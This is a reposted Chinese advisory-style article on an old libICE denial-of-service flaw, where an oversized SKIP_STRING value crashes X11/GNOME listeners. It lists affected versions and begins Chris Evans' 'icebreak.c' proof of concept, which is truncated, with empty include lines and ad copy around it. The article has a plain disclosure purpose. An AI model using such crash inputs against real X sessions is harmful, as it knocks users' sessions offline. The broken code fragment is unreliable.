此文章主要讲述的是libICE 库拒绝服务攻击漏洞,如果你对libICE 库拒绝服务攻击漏洞有兴趣的话,你就可以对以下的文章点击观看了,以下就是具体内容的描述,希望在你今后的学习中会有所帮助。
鄂托克网站制作公司哪家好,找创新互联建站!从网页设计、网站建设、微信开发、APP开发、响应式网站等网站项目制作,到程序开发,运营维护。创新互联建站从2013年开始到现在10年的时间,我们拥有了丰富的建站经验和运维经验,来保证我们的工作的顺利进行。专注于网站建设就选创新互联建站。
受影响系统:
GNOME Gnome 1.1
GNOME GNOME 1.0.x
Open Group X 11.0R6.x
Open Group X 11.0R6
Open Group X 11.0R5
XFree86 X11R6 4.0
XFree86 X11R6 3.3.6
- RedHat Linux 6.2 i386
XFree86 X11R6 3.3.5
- RedHat Linux 6.1 i386
XFree86 X11R6 3.3.4
XFree86 X11R6 3.3.3
不受影响系统:
GNOME Gnome 1.2
描述:
libICE是X11 window系统的一部分。由于在处理SKIP_STRING宏的时候存在一些问题,导致
任何使用libICE创建监听socket的应用程序都可以被远程攻击,使之停止服务。攻击者可以
给skip提供一个很大的值,使指针指向某些未初始化的内存区域,从而发生段访问错误。
GNOME中大量的使用了libICE,因此攻击者可能对正在运行GNOME的用户的X会话发动攻击。
<* 来源:Chris Evans *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* icebreak.c - Chris Evans */
#include
#include
#include
int
main(int argc, const char* argv[])
{
unsigned char c;
unsigned int i;
unsigned short s;
char blankbuf[1000];
memset(blankbuf, '\0', sizeof(blankbuf));
/* Assume fd 1 is stdout */
/* ICE connection header */
/* First, pick an endian-ness */
/* Byte 1: Major opcode. Must be 0 */
c = 0;
write(1, &c, 1);
/* Byte 2: Minor opcode. Must be ICE_ByteOrder (1) */
以上的相关内容就是对libICE 库拒绝服务攻击漏洞的介绍,望你能有所收获。
上述的相关内容就是对libICE 库拒绝服务攻击漏洞的描述,希望会给你带来一些帮助在此方面。
【编辑推荐】
文章题目:对libICE 库拒绝服务攻击漏洞的深入解析
标题路径:http://www.shufengxianlan.com/qtweb/news18/259468.html
网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联